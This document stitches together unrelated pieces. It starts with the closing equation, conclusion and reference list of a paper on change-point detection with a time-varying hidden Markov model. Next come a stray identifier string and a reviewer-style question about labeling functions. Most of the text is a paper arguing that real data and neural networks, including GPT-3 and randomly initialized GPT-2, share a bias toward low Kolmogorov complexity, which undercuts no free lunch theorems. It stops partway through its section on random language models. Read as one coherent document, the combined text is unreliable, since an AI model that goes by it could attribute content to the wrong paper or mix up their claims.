$$-\sum_{i=m}^{n} \mathbb{E}_{Q(u_k)}\big[(y_i - u_k)^T \Lambda_k(y_i - u_k)\big] \propto -(n-m+1) \cdot \left\|\sqrt{\Lambda_k}\, \mathbb{E}_{\hat{P}_m^n}[y] - \sqrt{\Lambda_k}\, \mathbb{E}_{Q(u_k)}[u_k]\right\|^2,$$
which is a special case of the MMD with the linear mapping $\varphi(x) = \sqrt{\Lambda_k}\, x$.

5 CONCLUSION

In this paper, we present TV-HMM, a time-varying Hidden Markov Model that enables the simultaneous detection of change points and estimation of regime characteristics. Our method utilizes a variational EM algorithm incorporating stochastic approximation, and we prove its convergence rate for each change point location. Furthermore, we prove that our algorithm consistently selects the true number and locations of change points. Extensive numerical experiments provide evidence for our theoretical results and demonstrate the promising performance of our approach. In cases where the data distributions are unknown, we generalize our method using the MMD and propose the semi-parametric TV-HMM, which does not rely on any distributional assumption. However, a limitation of the current research is that CPD methods are primarily established in the piecewise i.i.d setting. In the future, we hope to extend our framework to a broader class of CPD settings.

REFERENCES

Ryan Prescott Adams and David JC MacKay. Bayesian online changepoint detection. *arXiv preprint arXiv:0710.3742*, 2007.

Matias Altamirano, François-Xavier Briol, and Jeremias Knoblauch. Robust and scalable bayesian online changepoint detection. *arXiv preprint arXiv:2302.04759*, 2023.

Elena Andreou and Eric Ghysels. Detecting multiple breaks in financial market volatility dynamics. *Journal of Applied Econometrics*, 17(5):579–600, 2002.

Jushan Bai and Pierre Perron. Estimating and testing linear models with multiple structural changes. *Econometrica*, pp. 47–78, 1998.

Daniel Barry and John A Hartigan. A bayesian analysis for change point problems. *Journal of the American Statistical Association*, 88(421):309–319, 1993.
Yvonne M Bishop, Stephen E Fienberg, and Paul W Holland. *Discrete multivariate analysis: Theory and practice*. Springer Science & Business Media, 2007.

David M Blei, Alp Kucukelbir, and Jon D McAuliffe. Variational inference: A review for statisticians. *Journal of the American statistical Association*, 112(518):859–877, 2017.

ZI Botev, JF Grotowski, and DP Kroese. Kernel density estimation via diffusion. *Annals of Statistics*, 38(5):2916–2957, 2010.

Kenneth P Burnham and David R Anderson. Multimodel inference: understanding aic and bic in model selection. *Sociological methods & research*, 33(2):261–304, 2004.

Wei-Cheng Chang, Chun-Liang Li, Yiming Yang, and Barnabás Póczos. Kernel change-point detection with auxiliary deep generative models. *arXiv preprint arXiv:1901.06077*, 2019.

Siddhartha Chib. Estimation and comparison of multiple change-point models. *Journal of econometrics*, 86(2):221–241, 1998.

Matt Fleming, Piotr Kolaczkowski, Ishita Kumar, Shaunak Das, Sean McCarthy, Pushkala Pattabhiramam, and Henrik Ingo. Hunter: Using change point detection to hunt for performance regressions. In *Proceedings of the 2023 ACM/SPEC International Conference on Performance Engineering*, pp. 199–206, 2023.

Andrew B Gardner, Abba M Krieger, George Vachtsevanos, Brian Litt, and Leslie Pack Kaelbling. One-class novelty detection for seizure analysis from intracranial EEG. *Journal of Machine Learning Research*, 7(6), 2006.

Subhashis Ghosal, Jüri Lember, and Aad Van Der Vaart. Nonparametric bayesian model selection and averaging. *Electronic Journal of Statistics*, 2:63–89, 2008.

Zaid Harchaoui and Olivier Cappé. Retrospective multiple change-point estimation with kernels. In *2007 IEEE/SP 14th Workshop on Statistical Signal Processing*, pp. 768–772. IEEE, 2007.

Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. *Advances in neural information processing systems*, 33:6840–6851, 2020.

Yoshinobu Kawahara, Takehisa Yairi, and Kazuo Machida. Change-point detection in time-series data based on subspace identification. In *Seventh IEEE International Conference on Data Mining (ICDM 2007)*, pp. 559–564. IEEE, 2007.

Rebecca Killick, Paul Fearnhead, and Idris A Eckley. Optimal detection of changepoints with a linear computational cost. *Journal of the American Statistical Association*, 107(500):1590–1598, 2012.

Diederik P Kingma and Max Welling. Auto-encoding variational bayes. *arXiv preprint arXiv:1312.6114*, 2013.
X7nz6ljg9Y
End of 3.1: “allowing us to reject the hypothesis that the labeling functions are drawn uniformly at random with extremely high confidence.” Who would make the claim that labeling functions for real-world datasets are drawn uniformly at random?
The No Free Lunch Theorem, Kolmogorov Complexity, and the Role of Inductive Biases in Machine Learning Anonymous authors Paper under double-blind review Abstract No free lunch theorems for supervised learning state that no learner can solve all problems or that all learners achieve exactly the same accuracy on average over a uniform distribution on learning problems. Accordingly, these theorems are often referenced in support of the notion that individual problems require specially tailored inductive biases. While virtually all uniformly sampled datasets have high complexity, real-world problems disproportionately generate low-complexity data, and we argue that neural network models share this same preference, formalized using Kolmogorov complexity. Notably, we show that architectures designed for a particular domain, such as computer vision, can compress datasets on a variety of seemingly unrelated domains. Our experiments show that pre-trained and even randomly initialized language models prefer to generate low-complexity sequences. Whereas no free lunch theorems seemingly indicate that individual problems require specialized learners, we explain how tasks that often require human intervention such as picking an appropriately sized model when labeled data is scarce or plentiful can be automated into a single learning algorithm. These observations justify the trend in deep learning of unifying seemingly disparate problems with an increasingly small set of machine learning models. 1 Introduction The problem of justifying inductive reasoning has challenged epistemologists since at least the 1700s (Hume, 1748). How can we justify our belief that patterns we observed previously are likely to continue into the future without appealing to this same inductive reasoning in a circular fashion? Nonetheless, we adopt inductive reasoning whenever we learn from past experience. More recently, in the late 1990s, no free lunch theorems emerged from the computer science community as rigorous arguments for the impossibility of induction in contexts seemingly relevant to real machine learning problems (Wolpert, 1996; Wolpert & Macready, 1997). One such no free lunch theorem for supervised learning states that no single learner can achieve high accuracy on every problem (Shalev-Shwartz & Ben-David, 2014). Another states that every learner is equally good in expectation over a uniform distribution on learning problems (Wolpert, 1996). Such a world would be hostile to inductive reasoning. The assumption that labelings are drawn uniformly ensures that training data is uninformative about unseen samples. In contrast to this dismal outlook on machine learning, naturally occurring data involve structure that could be shared even across seemingly disparate problems. If we can design learning algorithms with inductive biases that are aligned with this structure, then we may hope to perform inference on a wide range of problems. In this work, we explore the alignment between structure in real-world data and machine learning models through the lens of Kolmogorov complexity. The Kolmogorov complexity of an output is defined as the length of the shortest program under a fixed language that produces it. In Section 3, we explain the connection between Kolmogorov complexity and compressibility. We note that virtually all data drawn from a uniform distribution as assumed by the no free lunch theorem of Wolpert (1996) cannot be significantly compressed, yet relevant real-world datasets are highly compressible. 
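To see this contrast concretely, Kolmogorov complexity can be crudely upper-bounded with an off-the-shelf compressor; the following minimal sketch (our own, with zlib standing in for the shortest-program length) compares uniformly random bytes with structured ones:

```python
import zlib
import random

def compressed_fraction(data: bytes) -> float:
    """Crude upper bound on K(x)/|x| via zlib: the shorter the compressed
    output, the lower the upper bound on Kolmogorov complexity."""
    return len(zlib.compress(data, level=9)) / len(data)

random.seed(0)
uniform = bytes(random.getrandbits(8) for _ in range(10_000))   # "NFL-style" data
structured = bytes(i % 7 for i in range(10_000))                # low-complexity data

print(compressed_fraction(uniform))     # ~1 (or slightly above): incompressible
print(compressed_fraction(structured))  # << 1: highly compressible
```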
In particular, neural networks themselves can be used to create compressions of data labelings, upper bounding their Kolmogorov complexity. We then demonstrate in Section 4 that modern neural networks also prefer low Kolmogorov complexity, complementing the low complexity of actual data. While models implemented on a computer cannot generate data with complexity exceeding the length of their associated program, we find they actually prefer data that is far simpler. We formulate simple languages for generating numerical sequences, under which we can directly measure the Kolmogorov complexity of a sequence. We use these languages to inspect the simplicity bias of both pre-trained and randomly initialized language models. GPT-3 (Brown et al., 2020) reliably favors less complex sequences, and bigger and better GPT-3 variants even more so. Notably, randomly initialized GPT models share this simplicity bias. To further emphasize the universality of this simplicity bias, we reshape tabular data from diverse domains, including click prediction and airline delay prediction, into images and feed them through convolutional computer vision architectures, showing that these vision architectures prefer correct labelings to random ones, even on data which do not remotely resemble natural images and have no spatial structure. We then compute cross-domain generalization bounds via Kolmogorov complexity. A common intuition associated with no free lunch theorems dictates that since a single learner cannot solve all problems, practitioners must inspect data and manually select an appropriate learner for the specific problem at hand. For example, a practitioner might select a more constrained model to avoid overfitting on small datasets, or convolutional architectures to accommodate natural image data. To the contrary, we show in Section 5 that the meta learner which selects the best learning algorithm from cross validation suffers little from overfitting even when the number of models investigated is large, and the cost of selection is quickly overcome by gains in validation accuracy. Moreover, a single learner, which supports a variety of functions but prefers simple ones, can solve a wide range of problems. We show that flexible models accompanied by a penalty encouraging simple solutions can solve problems at a variety of sample sizes. In fact, the historic evolution of machine learning supports the ability of a single learner to perform diverse tasks (see Appendix A, Figure 4) as highly task-specific pre-neural algorithms, such as LDA (Blei et al., 2003) and HOG (Dalal & Triggs, 2005), were replaced by neural architectures such as convolutional or recurrent models, and transformers can now handily perform all tasks listed in Appendix A, Figure 4. We summarize our contributions as follows: • We demonstrate the direct connection between compressibility and learnability that is implicit in no free lunch theorems by deriving a new no free lunch theorem using Kolmogorov complexity. • We show that the low Kolmogorov complexity of real datasets can be directly derived from the machine learning models used to fit them. • We compute the first cross-domain PAC-Bayes generalization bounds which show that neural networks such as convolutional architectures have low complexity biases that are relevant even on diverse tabular data far from what they were designed for. 
• We demonstrate GPT-3’s preference for sequences generated by short expression trees, and we find that even randomly initialized language models have a simplicity bias. In short, while the no free lunch theorems are regularly used to justify the need for specially tailored inductive biases (Ho & Pepyne, 2002; Whitley & Watson, 2005; Ciuffo & Punzo, 2013; Watson et al., 1999), we show that real-world data are not only highly structured, but share their structure to a large extent. We further show how intervening to embrace a flexible hypothesis space together with a simplicity bias can lead to effective learners in small and large data regimes. Our findings explain recently observed phenomena, ranging from the generality of transformers, to the lack of overfitting on the test sets of popular benchmarks noted in Recht et al. (2019). We summarize several key takeaways throughout the paper in blue. In Appendix I, we provide an extended discussion. 2 BACKGROUND We provide background on the no free lunch theorems, PAC-Bayes, and Kolmogorov complexity. We include an extended background discussion in Appendix B. No free lunch theorems. No free lunch theorems (NFL) state that without making strong assumptions, a single algorithm cannot simultaneously solve all problems well. In supervised learning, the focus of this paper, Wolpert (1996) and Schaffer (1994) famously prove that every learner—a function that takes in labeled data and outputs a labeling function for the associated domain—achieves the same average accuracy of 50% on unseen examples over all binary classification problems. Shalev-Shwartz & Ben-David (2014) instead do not assume a particular distribution over learning problems and prove that for every learner, there exists a task on which the learner achieves poor accuracy with high probability over training splits, whereas another learner achieves perfect accuracy. Notably, the latter NFL computes accuracy over all data, not just “off-training” samples. The practical relevance of this theorem again hinges on the distribution over real-world learning problems and how well it aligns with the inductive bias of a learner. In this paper, we argue that the real-world learning problems we care about share a high degree of common structure, and the inductive biases of neural networks are well-aligned with such problems. **Kolmogorov complexity and compression.** Kolmogorov complexity quantifies the structure in a bitstring, measuring the extent to which it can be compressed. For a fixed programming language $L$, the Kolmogorov complexity of data $x$, $K(x)$, is the length of the shortest program in that language that outputs $x$ (Kolmogorov, 1963). Analogous to conditional entropy, $K(y|x)$ is defined as the length of the shortest program which inputs $x$ and outputs $y$. Kolmogorov complexity provides a mathematical formalization of simplicity and Occam’s razor, which encompasses many related concepts like Shannon information, compression, and minimum description length (MDL) (Li et al., 2008). While objects with large Kolmogorov complexity are impossible to verify (Chaitin, 1974), they are abundant over all possible bitstrings. All but exponentially few sequences of a given length have near maximal Kolmogorov complexity and are thus incompressible. Taken over the uniform distribution over bitstrings $x$, $P(K(x) \leq n - k) \leq 2^{1-k}$. However as we will discuss, these high complexity objects are extremely uncommon in practice. 
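This asymmetry is easy to observe empirically. The following minimal sketch (our own illustration, using zlib as an off-the-shelf compressor, which only ever upper bounds the true Kolmogorov complexity) shows that uniformly sampled bytes are essentially incompressible, while structured data compresses dramatically.

```python
import os
import zlib

# Crude upper bound on Kolmogorov complexity: the size of a
# zlib-compressed representation (the fixed decompressor length is
# omitted since it is constant across inputs).
def compressed_bits(data: bytes) -> int:
    return 8 * len(zlib.compress(data, 9))

n = 100_000
random_bytes = os.urandom(n)          # (pseudo)uniformly sampled data
structured_bytes = b"01" * (n // 2)   # highly structured, low-complexity data

print(compressed_bits(random_bytes) / (8 * n))      # ~1.0: incompressible
print(compressed_bits(structured_bytes) / (8 * n))  # <<1: highly compressible
```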
**Universal induction.** Inspired by Kolmogorov complexity, a line of work introduces universal induction methods, which prefer low complexity answers (Solomonoff, 1964; Hutter, 2000; Lattimore & Hutter, 2013; Nakkiran, 2021). Notably, Solomonoff induction (Solomonoff, 1964; Rathmanner & Hutter, 2011) makes predictions by applying Bayes rule to the universal prior which favors low complexity, and provides learning guarantees. Rather than formalizing theoretical learners that rely on Kolmogorov complexity, which is in general uncomputable, Fernández-Delgado et al. (2014) and Gómez & Rojas (2016) test popular machine learning algorithms on a diverse array of datasets to see if any existing algorithms are plausibly universal. Another line of work shows that a single transformer model can perform well on many problems (Müller et al., 2022; Hollmann et al., 2022). **PAC-Bayes generalization theory.** The PAC-Bayes framework is a convenient paradigm for proving generalization bounds on parametric models, while avoiding the pitfalls of uniform convergence. Rather than considering all elements of the hypothesis class on equal footing, we choose prior and posterior distributions over the parameters, and the generalization gap for elements of the posterior depends merely on the discrepancy between the two as measured by the KL divergence. This framework can explain many favorable properties of neural networks like flat minima (Hochreiter & Schmidhuber, 1997), noise resilience (Arora et al., 2018), and compressibility (Zhou et al., 2018). It can also provide nonvacuous generalization bounds, with recent bounds drawing directly from Kolmogorov complexity and the universal prior (Lotfi et al., 2022). **On the relationship between our contributions and existing literature.** (1) In contrast to previous works which counter the no free lunch theorem by observing that a single model can achieve better-than-average empirical accuracy across diverse datasets (Fernández-Delgado et al., 2014; Gómez & Rojas, 2016), we explain and formalize the structures which are universal across such data distributions using Kolmogorov complexity. Relating this formalism to learning, we then show why low complexity is fundamental to such successes of machine learning models by proving a novel no free lunch theorem directly using Kolmogorov complexity. (2) The preference we demonstrate for low complexity emerges naturally in a variety of models, from transformer language models to convolutional neural networks, and requires no special interventions as proposed in Schmidhuber (1997) or Hinton & Van Camp (1993). (3) Existing generalization bound literature tunes priors on specific data distributions (Dziugaite & Roy, 2017; 2018; Pérez-Ortiz et al., 2021; Dziugaite et al., 2021) in line with the idea, often drawn from no free lunch theorems, that each domain requires a specially tailored model. In contrast, we demonstrate that neural networks can compress a wide range of datasets in domains they were not even designed for, and that this compressibility can explain generalization via PAC-Bayes generalization bounds. (4) Common wisdom dictates that neural network architectures must be carefully chosen for specific problems or sample sizes (Grinsztajn et al., 2022; Brigato & Iocchi, 2021; Lee et al., 2021), but we instead show through the formalism of complexity and experiments that specialized models can in principle be combined into a single learner which can perform well on a wide variety of problems and sample sizes. 
Moreover, we show that the cost of model selection is minimal, explaining recently observed phenomena such as the lack of overfitting to the test sets of popular benchmarks (Recht et al., 2019). 3 UNPACKING THE NO FREE LUNCH THEOREM WITH KOLMOGOROV COMPLEXITY The often-cited no free lunch theorem of Wolpert (1996) states that all learners perform the same when averaged over a uniform distribution on all possible datasets. However, since most possible datasets are incompressible, the assumption of uniform samples subtly selects high-complexity, incompressible data, on which learning is fundamentally impossible. We elucidate the centrality of complexity in NFL theorems by deriving a new NFL theorem which uses the incompressibility of random data to show why learning is impossible on such data. In Appendix C, we provide a brief introduction to bounding the Kolmogorov complexity of a dataset by compressing it and adding up the file sizes of both the compressed file and the decompression code. Through hypothesis testing, we rule out the possibility that real datasets have complexity as high as randomly drawn ones. 3.1 NNs AS COMPRESSORS OF THE LABELING FUNCTION Relevant to supervised learning, we show that not only are unlabeled datasets compressible—the labeling functions are too. Further, we can demonstrate their compressibility concretely using trained models as compressors. Given a labeled dataset \( D = (X, Y) = \{(x_i, y_i)\}_{i=1}^n \), any likelihood model \( p(y|x) \)—regardless of whether the top predictions are correct—can be used to generate a lossless compression scheme to encode the dataset labels \( Y \) given the inputs \( X \). Using a stream code such as arithmetic coding (Witten et al., 1987), in combination with the probability model \( p(y|x) \), the labels can be encoded in \( K(Y|X,p) \leq -\sum_{i=1}^n \log_2 p(y_i|x_i) + 2 \) bits (see e.g. MacKay (2003)). Models which maximize the log likelihood of the data also implicitly minimize the length of this encoding. As we derive in Appendix D, \( K(Y|X) \leq K(Y|X,p) + K(p) + 2 \log_2 K(p) + c \), where \( c \) is a small constant depending on the language. Writing the negative log likelihood in terms of the empirical cross entropy, combining our two inequalities, and dividing by the size of the dataset \( n \) yields \[ \frac{1}{n} K(Y|X) \leq \frac{\text{CE}}{\ln 2} + n^{-1}(K(p) + 2 \log_2 K(p) + c), \quad (1) \] where CE is the cross entropy of the classifier \( p \) averaged over dataset \( D \). This inequality implies that, no matter how large the model is, it provides a non-trivial compression of the dataset once the size \( n \) of the dataset grows sufficiently large, as long as its CE is lower than that of random guessing. To demonstrate this fact, we employ the compression scheme from Lotfi et al. (2022) in order to find a compressed representation of MLPs on several class-balanced tabular classification datasets (available at openml.org). As shown in Figure 1 (left), we are able to compress the labels on most of the datasets to well below the naive \( n \log_2 C \) encoding length, where \( C \) is the number of classes. We also apply the method with convolutional architectures to compress labels on CIFAR-10 and CIFAR-100 in Figure 1 (middle), allowing us to reject, with extremely high confidence, the hypothesis that the labeling functions are drawn uniformly at random.
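As a concrete illustration of Equation 1, the following sketch plugs hypothetical numbers into the bound; the dataset size, class count, compressed model size $K(p)$, and the per-label probability of 0.3 are illustrative assumptions rather than measured values.

```python
import numpy as np

# Illustrative numbers for Equation 1 (all assumed, not measured):
n, C = 50_000, 10          # dataset size and number of classes
K_p = 50_000               # hypothetical compressed model size in bits
p_correct = 0.3            # assumed probability the model puts on each label

# Arithmetic-coding length of the labels given the model (Section 3.1).
nll_bits = -n * np.log2(p_correct) + 2

# Upper bound on K(Y|X) from Equation 1, up to the language constant c.
bound_bits = nll_bits + K_p + 2 * np.log2(K_p)
naive_bits = n * np.log2(C)  # direct n*log2(C) encoding of the labels

print(f"{bound_bits:.0f} < {naive_bits:.0f}: {bound_bits < naive_bits}")
```

Even with a model whose accuracy is far from perfect, the bound falls below the naive encoding length, so the labels are provably compressible.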
3.2 A KOLMOGOROV-STYLE NO FREE LUNCH THEOREM A corollary of Equation 1 is that if the dataset is incompressible, then no model can do better than random chance in the large dataset limit, as we show in Theorem 1. Since compressible datasets are exponentially unlikely under uniform sampling, we can prove our own version of the no free lunch theorem: with very high probability, learning is impossible on any given uniformly sampled dataset. **Theorem 1.** Let \((X,Y)\) be a labeled dataset with \( n \) data points and labels sampled uniformly at random from \( C \) classes. Then, with probability at least \( 1 - \delta \), for every classifier \( p(y|x) \), \[ \text{CE}(p) \geq \ln C - \frac{\ln 2}{n} (K(p) + 2 \log_2 K(p) + \log(1/\delta) + c), \] where \( \text{CE}(p) \) is the empirical cross entropy of the classifier \( p(y|x) \) on the data. Thus for any model of bounded size, if the size of the dataset is large enough, the model cannot represent any classifier with cross entropy appreciably smaller than that attained by random guessing. The proof is given in Appendix D. Figure 1: (Left): Compressed sizes of tabular labels, where compression is performed via a trained MLP model (as in Section 3.1) vs. direct encoding of labels ($n \log_2 C$). (Middle): Compression of image classification datasets using CNNs. Note the breakdown of the total compressed size of the labels into model fit (NLL Bits), compressed parameters (Model Bits), and architecture and decompressor (Code Bits). In both cases, models can greatly compress a diverse suite of datasets, highlighting a common structure shared by models and real-world data. (Right): Compression-based generalization bounds (Lotfi et al., 2022) for CNNs on tabular data, fed in with each pixel representing a tabular feature. The bounds are able to explain the majority of the model performance as shown by the test error, indicating that even CNNs designed for computer vision have a generic inductive bias appropriate for a wide range of datasets containing no spatial structure at all. Like any of the no free lunch theorems, the necessary existence of unsolvable problems initially seems limiting. However, learning is in fact possible on compressible datasets (ones with less than maximal complexity). Real datasets are highly unlike the high-complexity samples from the uniform distribution associated with no free lunch theorems, on which learning is impossible. The common structure shared by real datasets nullifies the limitations imposed by no free lunch theorems. 4 LOW-COMPLEXITY BIAS IN MACHINE LEARNING MODELS Previously, we saw that real-world data distributions across domains share a common low Kolmogorov complexity bias. If we can construct models which prefer low-complexity data, we can hope to perform inference with a single model across many domains. While early machine learning systems incorporated highly domain-specific designs, such as handcrafted image features (Dalal & Triggs, 2005) or graphical models for language (Mnih & Hinton, 2007), modern neural network architectures across domains are converging on transformers (Vaswani et al., 2017; Dosovitskiy et al., 2020; Gulati et al., 2020; Somepalli et al., 2021), some of which can simultaneously achieve impressive performance on a variety of data types with a single architecture (Jaegle et al., 2021). In this section, we argue that neural networks have a generic simplicity bias that extends beyond the datasets for which they are designed.
To this end, we: (1) feed tabular datasets from diverse domains such as click prediction and airline delay prediction into convolutional networks designed specifically for computer vision and find that they provably generalize well due to their simplicity bias, (2) formulate a language with respect to which we can measure the Kolmogorov complexity of numerical sequences and observe that GPT-3 generates low-complexity sequences with exponentially higher probability, and (3) predict the next term in a sequence with randomly initialized language models. Whereas the no free lunch theorem of Wolpert (1996) implies that such an inference procedure cannot outperform random guessing on average, we find that randomly initialized neural networks prefer sequence completions which yield low-complexity completed sequences, demonstrating that they can make accurate guesses as long as the true sequence distribution also favors low complexity. 4.1 BOUNDING GENERALIZATION BY COMPLEXITY Generalization bounds limit how far the expected risk $R(h)$ for a model $h$ can differ from its train risk $\hat{R}(h)$. One simple such generalization bound is the finite hypothesis bound under a prior $P(h)$ (Langford & Seeger, 2001): with probability $1 - \delta$, $R(h) \leq \hat{R}(h) + \sqrt{\frac{\log 1/P(h) + \log 1/\delta}{2n}}$. Relating to Occam's razor and Solomonoff induction, consider the universal prior that assigns higher likelihood to compressible hypotheses: $P(h) = 2^{-K_p(h)}/Z$, where $K_p(h) \leq K(h) + 2\log_2 K(h)$ is the prefix Kolmogorov complexity and $Z \leq 1$. Combining the two, we have with probability $1 - \delta$, $$R(h) \leq \hat{R}(h) + \sqrt{\frac{K_p(h) \log 2 + \log 1/\delta}{2n}}.$$ (3) Despite the simplicity of the finite hypothesis bound, when combined with the universal prior, it provides nontrivial statements about generalization even for neural networks which have many more parameters than data points (Lotfi et al., 2022). Solutions found by many machine learning models on real datasets are highly compressible, and this reflects their bias for low Kolmogorov complexity functions. Even under an arbitrarily large or even infinite hypothesis space, generalization is possible if we assign prior mass disproportionately to the highly structured data that typically occurs. 4.2 Neural Networks Prefer Naturally Occurring Labelings Across Domains The inductive biases of even specialized architectures like convolutional networks facilitate broad learning abilities. We now illustrate how a preference for low complexity alone is sufficient for a high degree of generalization, provably, since real-world data labelings tend to have low complexity. To illustrate this fact, we take tabular classification datasets and encode the tabular features as an image, simply forming images in which each pixel corresponds to a different feature, zero-padding as necessary. We train a small convolutional network using this input data to predict the classification labels. Since the data has no local or translation-equivariant structure, learning with the convolutional network requires overcoming its strong inductive bias, which was hand-tailored for settings with such structure. Even despite this extreme mismatch, the convolutional networks perform well. Using the compression and PAC-Bayes bound methodology from Lotfi et al. (2022) (see Equation 3), we show the generalization bounds on these models along with test error in Figure 1 (right).
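A minimal sketch of this tabular-to-image construction is shown below; the feature count, batch size, and tiny CNN are stand-ins we chose for illustration, not the architecture behind Figure 1.

```python
import numpy as np
import torch
import torch.nn as nn

def tabular_to_image(X: np.ndarray, side: int) -> torch.Tensor:
    """Zero-pad each row of tabular features and reshape it into a
    1-channel side x side 'image', as described in Section 4.2."""
    n, d = X.shape
    padded = np.zeros((n, side * side), dtype=np.float32)
    padded[:, :d] = X
    return torch.from_numpy(padded).reshape(n, 1, side, side)

# Hypothetical tabular batch: 128 rows with 37 features, 2 classes.
X = np.random.randn(128, 37).astype(np.float32)
side = int(np.ceil(np.sqrt(37)))               # a 7x7 image holds 37 features

cnn = nn.Sequential(
    nn.Conv2d(1, 16, kernel_size=3, padding=1), nn.ReLU(),
    nn.AdaptiveAvgPool2d(1), nn.Flatten(), nn.Linear(16, 2),
)
logits = cnn(tabular_to_image(X, side))        # shape: (128, 2)
print(logits.shape)
```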
The strong generalization of convolutional networks on tabular datasets is almost entirely explainable through simplicity bias as shown by the fact that a finite hypothesis bound nearly matches the test error. Though CNNs were designed for vision, they generalize on unrelated tabular domains, a phenomenon almost entirely explained by their preference for low-complexity solutions. 4.3 GPT-3 Assigns Exponentially Higher Probability to Simpler Sequences We now study the preference of GPT-3—a line of autoregressive LLMs—for simpler sequences. The ability of language models to solve reasoning problems has recently been studied by Zelikman et al. (2022), who develop a prompting framework, and d’Ascoli et al. (2022), who develop transformers for predicting symbolic expressions directly from the sequence. To perform our own study, we need a well-defined, computable notion of complexity. We thus define a simple, non-Turing-complete language and measure complexity with respect to this simple language. Namely, we generate integer sequences with binary expression trees. We then define the complexity of a sequence as the size of the smallest expression tree, measured by the number of internal nodes—or equivalently the number of operators in the expression represented by the tree—that generates that sequence. Note that while distinct from Kolmogorov complexity, the Kolmogorov complexity can be upper bounded by this complexity plus an added constant to encode the language. By using a small set of terms for the leaves and binary operators for the nodes, we can enumerate over all possible expression trees for small sizes at most $L$ and compute all sequences with complexities 0 through $L$. In our experiments, we use operations $+, \times$, and $//$, where $//$ denotes integer division. For leaves, we use 2 and $i$, where $i$ is the index within the sequence. For example, $(2 + i) \times i$ could be implemented with a tree of size 2 and would generate the sequence $a_i = 0, 3, 8, 15, ...$. Using this setup, we can generate sequences of varying complexity, according to a well-defined metric, and quantify the preference of GPT-3 models for simpler sequences over more complex ones. We provide details on how we tokenize sequences and extract their probabilities in Appendix F. In Figure 2, we measure the average log-probability GPT-3 models assign to sequences of a given Kolmogorov complexity, where we fix the number of numerical tokens input into the model to be 30, and we observe that the probabilities assigned by these language models decrease exponentially with sequence complexity, similar to the Solomonoff prior discussed in Section 2. In contrast, a uniform prior would be described by a flat line. Since GPT-3 outputs per-token softmax probabilities conditional on all previous tokens within their context, we can compute the log-probability of a sequence of tokens as \( \log P(\text{Sequence}) = \sum_i \log P(\text{Token}_i | \{\text{Token}_{<i}\}) \). Note we cannot easily measure the minimum description length of very complex sequences, so we limit our experiments to expression trees with at most 7 operators. In this low-complexity regime, we observe that big GPT-3 models which excel at language modeling, e.g. Davinci which contains 175 billion parameters, assign higher probability to these simple sequences than much smaller GPT-3 models such as Ada. We can also examine the decay of such log-probabilities as we feed more tokens, corresponding to digits of sequence elements, into the model. 
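To make the language concrete, the following sketch (our own reconstruction; the sequence length, enumeration order, and the guard for division by zero are assumptions) enumerates expression trees bottom-up and recovers the minimal tree size for every sequence it can generate.

```python
from itertools import product

T = 8                                        # sequence length we evaluate
LEAVES = [tuple([2] * T), tuple(range(T))]   # the constant 2 and the index i
OPS = [lambda a, b: a + b,
       lambda a, b: a * b,
       lambda a, b: a // b if b != 0 else 0]  # assumed guard for b = 0

def sequences_up_to(L):
    """Map each generated sequence to the size of the smallest expression
    tree (number of operators) that produces it, for sizes 0..L."""
    by_size = {0: set(LEAVES)}
    complexity = {s: 0 for s in LEAVES}
    for size in range(1, L + 1):
        new = set()
        for left in range(size):              # split remaining size - 1 nodes
            right = size - 1 - left
            for a, b, op in product(by_size[left], by_size[right], OPS):
                seq = tuple(op(x, y) for x, y in zip(a, b))
                if seq not in complexity:     # first time seen = minimal size
                    complexity[seq] = size
                    new.add(seq)
        by_size[size] = new
    return complexity

cx = sequences_up_to(3)
print(cx[tuple((2 + i) * i for i in range(T))])  # 2, matching the example
```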
As the sequences get longer, we see in Figure 2 that the probabilities assigned to sequences decay sub-exponentially, indicating that these models, especially bigger variants such as Davinci, become more and more confident about later sequence elements. ### 4.4 Even Randomly Initialized Language Models Prefer Low Complexity The previous section examined pre-trained language models, but these models were trained on massive corpora of data. Do they prefer low complexity at initialization, before they have even seen any data at all? While the initialization of neural network parameters is highly diffuse, these random parameters can induce a highly structured distribution over functions. Trained language models are known to repeat themselves (Holtzman et al., 2020; Fu et al., 2021). One might think that this behavior is learned from training data which contains repeated text, but we show that randomly initialized GPT models repeat themselves too. Interestingly, we can formalize the preference for repetition as a preference for low Kolmogorov complexity. In order to disentangle the impact of initialization from training, we adopt a simple language for generating binary sequences under which we can quickly measure Kolmogorov complexity. We consider a program to be a bitstring, which upon execution simply repeats itself until the output reaches length 10. Under this language, the sequence 0, 0, 0, ... has Kolmogorov complexity 1, and 0, 1, 0, 1, ... has complexity 2, yet randomly generated sequences are exponentially more likely to have high complexity. We conduct our evaluations exhaustively on all such sequences of length 10. We now generate sequences of length 10 with randomly initialized GPT-2 language models (Radford et al., 2019), using each initialization to generate one sequence, and we measure the frequency with which each sequence is generated. We estimate generation probabilities as a function of Kolmogorov complexity in Appendix G, where we again see that low-complexity sequences are assigned exponentially higher probabilities. Here, we compare (1) the uniform distribution over sequences, (2) randomly initialized GPT-2, as well as (3) pre-trained GPT-2 models. We see that randomly initialized parameters induce a structured distribution over sequences, and pre-trained checkpoints exhibit an even stronger preference for low complexity, as they are trained on structured text. We can also use randomly initialized language models to perform next-element prediction by estimating the probabilities they assign to the next element in a sequence, given that they have correctly generated the previous terms. While Wolpert's no free lunch theorem (Wolpert, 1996) ensures that the average completion accuracy over all possible length-10 bitstrings is exactly 0.5, we verify in Appendix G that randomly initialized networks can be used for sequence completion when the sequence has low complexity. We can further generate very long length-100 sequences with randomly initialized and pre-trained GPT-2 models and run a simple hypothesis test, demonstrating that both randomly initialized and pre-trained models generate sequences of lower Kolmogorov complexity on average than a uniform distribution.
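Under our reading of this repetition language, its complexity measure can be computed exactly with a few lines of code; the examples below are illustrative.

```python
def repetition_complexity(seq: str, length: int = 10) -> int:
    """Kolmogorov complexity under the repetition language of Section 4.4:
    the length of the shortest bitstring that, repeated and truncated to
    `length`, reproduces seq."""
    assert len(seq) == length
    for k in range(1, length + 1):
        if (seq[:k] * length)[:length] == seq:
            return k
    return length  # unreachable: k = length always matches

print(repetition_complexity("0000000000"))  # 1
print(repetition_complexity("0101010101"))  # 2
print(repetition_complexity("0001011101"))  # 10: incompressible here
```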
